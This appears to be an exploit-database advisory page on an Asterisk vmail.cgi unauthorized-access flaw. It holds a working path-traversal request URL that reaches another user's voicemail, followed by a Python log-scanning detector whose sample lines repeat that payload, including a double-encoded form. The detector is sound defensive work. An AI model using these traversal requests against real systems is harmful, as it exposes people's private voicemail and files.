Asterisk Unauthorized Access Vulnerability - exploit.company
Vendor: Asterisk
By: Not mentioned
CVSS: 7.5 HIGH
Unauthorized Access
CWE: 287
Product Name: Asterisk
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Not mentioned
CPE: a:asterisk:asterisk
Metasploit:
Other Scripts:
Platforms Tested: Not mentioned
Unknown

Asterisk Unauthorized Access Vulnerability

The vulnerability allows an attacker to access a victim user's voicemail and any .wav/.WAV files on the affected system by exploiting a failure in the application's verification of user-supplied input.

Mitigation:

Apply the latest security updates and patches from the vendor. Avoid using default or weak passwords for voicemail accounts.

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/15336/info

Asterisk is prone to an unauthorized-access vulnerability. This issue is due to a failure in the application to properly verify user-supplied input.

Successful exploitation will grant an attacker access to a victim user's voicemail and to any '.wav/.WAV' files currently on the affected system. 

http://www.example.org/cgi-bin/vmail.cgi?action=audio&folder=../201/INBOX&mailbox=200&context=default&password=12345&msgid=0001&format=wav
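
A detection check for the request pattern above, as an added example that is not part of the original advisory or of Asterisk: it scans web-server access-log lines for vmail.cgi requests whose folder, mailbox, context or msgid value is not a plain name. The allowed character set, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# vmail.cgi parameters that name a mailbox, folder or message
# (names taken from the example URL on this page).
CHECKED_PARAMS = ("folder", "mailbox", "context", "msgid")
# Assumption: legitimate values are plain names such as "INBOX" or "200".
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]+")
# Request line as it appears in an Apache combined-style access log.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %252e) up to a fixed depth."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_params(request_target):
    """Return {param: decoded value} for checked parameters that are not plain names."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("/vmail.cgi"):
        return {}
    hits = {}
    # parse_qsl decodes once; fully_decode handles double-encoded values.
    for name, raw in parse_qsl(parts.query):
        value = fully_decode(raw)
        if name in CHECKED_PARAMS and not SAFE_VALUE.fullmatch(value):
            hits[name] = value
    return hits

def scan(log_lines):
    """Yield (line_number, hits) for access-log lines with flagged parameters."""
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        hits = suspicious_params(match.group(1)) if match else {}
        if hits:
            yield number, hits

# Constructed sample lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/vmail.cgi?action=audio&folder=INBOX&mailbox=200&context=default&msgid=0001&format=wav HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/vmail.cgi?action=audio&folder=../201/INBOX&mailbox=200&context=default&msgid=0001&format=wav HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/vmail.cgi?action=audio&folder=%252e%252e%252f201%252fINBOX&mailbox=200&context=default&msgid=0001&format=wav HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(number, hits)
```

A hit where the flagged folder value names a mailbox other than the one in the mailbox parameter, as in the second and third sample lines, is the case the advisory describes.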